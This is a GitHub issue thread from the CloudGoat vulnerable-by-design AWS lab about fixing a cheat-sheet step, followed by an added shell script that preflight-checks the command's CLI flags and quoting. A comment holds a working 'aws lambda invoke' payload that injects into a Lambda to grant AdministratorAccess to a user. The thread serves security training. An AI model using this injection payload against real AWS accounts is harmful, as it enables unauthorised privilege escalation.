RhinoSecurityLabs / cloudgoat

CloudGoat is Rhino Security Labs' "Vulnerable by Design" AWS deployment tool
BSD 3-Clause "New" or "Revised" License

vulnerable_lambda cheat sheet not up to date #197

Closed cyberqueenmeg closed 7 months ago

cyberqueenmeg commented 1 year ago

Hi,

Step 5 of vulnerable_lambda in the cheat sheet is out of date. From what I can discern, the --cli-binary-format tag does not exist in the aws lambda invoke command anymore, making the command fail. I tried removing the tag and it still did not work because the payload is not in JSON.

duckbillsecurity commented 1 year ago

Hi, I managed to get it working by replacing the [ ] with " " around bilbo_user_name_here:

aws --profile assumed_role --region us-east-1 lambda invoke --function-name [policy_applier_lambda_name] --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "bilbo_user_name_here"}' out.txt

jdearmas commented 7 months ago

Hello @cyberqueenmeg, hope you are well!

My findings align with @duckbillsecurity (thank you for your research).

The aws lambda invoke command accepted the --cli-binary-format when I tried.

Can you post what version of the AWS CLI you have?

Mine was: aws-cli/2.7.33 Python/3.9.11 Windows/10 exe/AMD64 prompt/off

If you update your AWS CLI version and still see an error, I would recommend trying the steps outlined in this pull request: #243.

I'll close this issue for now since I can't reproduce it, but if you still have it we can reopen it 👍
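An added example, not part of the thread or of CloudGoat's own material: an offline preflight for the invoke command discussed above. It assumes the reported "flag does not exist" error comes from an AWS CLI v1 install, which has no `--cli-binary-format` option, and that the original cheat sheet wrapped the user name in `[ ]`; all function names and the bracketed sample payload are constructed for illustration.

```shell
#!/bin/sh
# Added example: offline preflight checks for the `aws lambda invoke` command in this thread.

# Print the major version from an `aws --version` banner, e.g. "aws-cli/2.7.33 ...".
aws_cli_major() {
  case $1 in
    aws-cli/[0-9]*) v=${1#aws-cli/}; printf '%s\n' "${v%%.*}" ;;
    *) return 1 ;;
  esac
}

# AWS CLI v2 treats blob parameters such as --payload as base64 unless told
# otherwise; v1 has no --cli-binary-format option and rejects it.
binary_format_args() {
  major=$(aws_cli_major "$1") || return 1
  if [ "$major" -ge 2 ]; then
    printf '%s\n' '--cli-binary-format raw-in-base64-out'
  fi
}

# Succeed if an argument still holds an unreplaced [placeholder] from the cheat sheet.
has_placeholder() {
  printf '%s\n' "$1" | grep -Eq '\[[A-Za-z_]+\]'
}

# The payload exactly as the shell passes it on after processing the '"'"' idiom
# (close single quotes, one double-quoted ', reopen single quotes).
thread_payload() {
  printf '%s\n' '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "bilbo_user_name_here"}'
}

# Constructed sample: the same payload with the user name still in [ ] brackets.
bracket_payload() {
  printf '%s\n' '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": [bilbo_user_name_here]}'
}

# Report for a given version banner (pass "$(aws --version 2>&1)" on a real host).
preflight() {
  binary_format_args "$1" >/dev/null || { echo "unrecognised banner: $1"; return 1; }
  echo "extra args: $(binary_format_args "$1")"
  if has_placeholder "$2"; then echo "payload: unreplaced placeholder"; return 1; fi
  echo "payload: ok"
}

preflight 'aws-cli/2.7.33 Python/3.9.11 Windows/10 exe/AMD64 prompt/off' "$(thread_payload)"
```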